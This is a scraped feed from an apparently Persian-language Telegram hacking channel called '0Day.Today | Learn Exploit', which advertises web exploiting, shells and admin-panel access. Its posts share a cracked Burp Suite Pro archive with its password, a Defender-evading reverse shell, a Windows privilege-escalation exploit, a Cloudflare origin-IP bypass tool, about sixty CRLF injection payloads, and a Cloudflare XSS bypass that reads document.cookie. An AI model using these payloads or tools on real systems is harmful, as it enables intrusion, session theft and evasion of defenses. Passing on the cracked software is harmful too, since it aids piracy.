0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
vless://6d5278db-dec0-4157-ac95-2149910022fe@s.thisisforu.sbs:43978?type=tcp&security=none#LearnExploit

آقا اینم بزنین عشق کنین ❤️‍🔥
۵۰ گیگه

——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥2👍1
Honeypots Detection 🐝

Nuclei templates for honeypots detection. 🍯

Github

#honeypot #nuclei
——————
0Day.Today
@LearnExploit
@Tech_Army
5❤‍🔥1
burpsuite_pro_v2023.11.1.2.zip
680.3 MB
Burp Suite Version 2023.11.1.2

آموزش استفاده در فایل Readme گفته شده .
* نکته : برای اجرا شدن نیاز به Java ورژن 18 به بالا نیاز خواهید داشت . *

Pass : 311138

#burpsuite
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥6👍1
به دست آوردن ip پشت cloudflare با ابزار CloakQuest3r

Github

#tools #cloudflare #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
19👍5🔥3
Kalafegi
Dorcci
Mood...

hr
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥1👍1💔1
Nim Shell - Reverse shell that can bypass windows defender detection

Github

#bypass #windows #shell
——————
0Day.Today
@LearnExploit
@Tech_Army
41
photo location finder - This program allows the user to detect landmarks in an image using the Google Cloud Vision API.

Github

#osint
——————
0Day.Today
@LearnExploit
@Tech_Army
31
Terrapin Attack ⚠️

Link

#SSH
——————
0Day.Today
@LearnExploit
@Tech_Army
21👍1
CVE-2023-41772 - UIFuckUp exploit to gain system privileges as user on Windows 10 (1809 and up) and 11

Github

#CVE #Exploit #Windows
——————
0Day.Today
@LearnExploit
@Tech_Army
❤‍🔥3👍2
CRLF Injection Payloads

%0AHeader-Test:Bug


%0A%20Header-Test:Bug


%20%0AHeader-Test:Bug


%23%OAHeader-Test:Bug


%E5%98%8A%E5%98%8DHeader-Test:Bug


%E5%98%8A%E5%98%8D%0AHeader-Test:Bug


%3F%0AHeader-Test:Bug


crlf%0AHeader-Test:Bug


crlf%0A%20Header-Test:Bug


crlf%20%0AHeader-Test:Bug


crlf%23%OAHeader-Test:Bug


crlf%E5%98%8A%E5%98%8DHeader-Test:Bug


crlf%E5%98%8A%E5%98%8D%0AHeader-Test:Bug


crlf%3F%0AHeader-Test:Bug


%0DHeader-Test:Bug


%0D%20Header-Test:Bug


%20%0DHeader-Test:Bug


%23%0DHeader-Test:Bug


%23%0AHeader-Test:Bug


%E5%98%8A%E5%98%8DHeader-Test:Bug


%E5%98%8A%E5%98%8D%0DHeader-Test:Bug


%3F%0DHeader-Test:Bug


crlf%0DHeader-Test:Bug


crlf%0D%20Header-Test:Bug


crlf%20%0DHeader-Test:Bug


crlf%23%0DHeader-Test:Bug


crlf%23%0AHeader-Test:Bug


crlf%E5%98%8A%E5%98%8DHeader-Test:Bug


crlf%E5%98%8A%E5%98%8D%0DHeader-Test:Bug


crlf%3F%0DHeader-Test:Bug


%0D%0AHeader-Test:Bug


%0D%0A%20Header-Test:Bug


%20%0D%0AHeader-Test:Bug


%23%0D%0AHeader-Test:Bug


\r\nHeader-Test:Bug


 \r\n Header-Test:Bug


\r\n Header-Test:Bug


%5cr%5cnHeader-Test:Bug


%E5%98%8A%E5%98%8DHeader-Test:Bug


%E5%98%8A%E5%98%8D%0D%0AHeader-Test:Bug


%3F%0D%0AHeader-Test:Bug


crlf%0D%0AHeader-Test:Bug


crlf%0D%0A%20Header-Test:Bug


crlf%20%0D%0AHeader-Test:Bug


crlf%23%0D%0AHeader-Test:Bug


crlf\r\nHeader-Test:Bug


crlf%5cr%5cnHeader-Test:Bug


crlf%E5%98%8A%E5%98%8DHeader-Test:Bug


crlf%E5%98%8A%E5%98%8D%0D%0AHeader-Test:Bug


crlf%3F%0D%0AHeader-Test:Bug


%0D%0A%09Header-Test:Bug


crlf%0D%0A%09Header-Test:Bug


%250AHeader-Test:Bug


%25250AHeader-Test:Bug


%%0A0AHeader-Test:Bug


%25%30AHeader-Test:Bug


%25%30%61Header-Test:Bug


%u000AHeader-Test:Bug


//www.google.com/%2F%2E%2E%0D%0AHeader-Test:Bug


/www.google.com/%2E%2E%2F%0D%0AHeader-Test:Bug


/google.com/%2F..%0D%0AHeader-Test:Bug


#CRLF #Payload
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥4👍31
Cloudflare XSS Bypass for reflected XSS ⚡️

<svg%20oNinad=1%20onload=alert(document.cookie)>


#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
7🔥2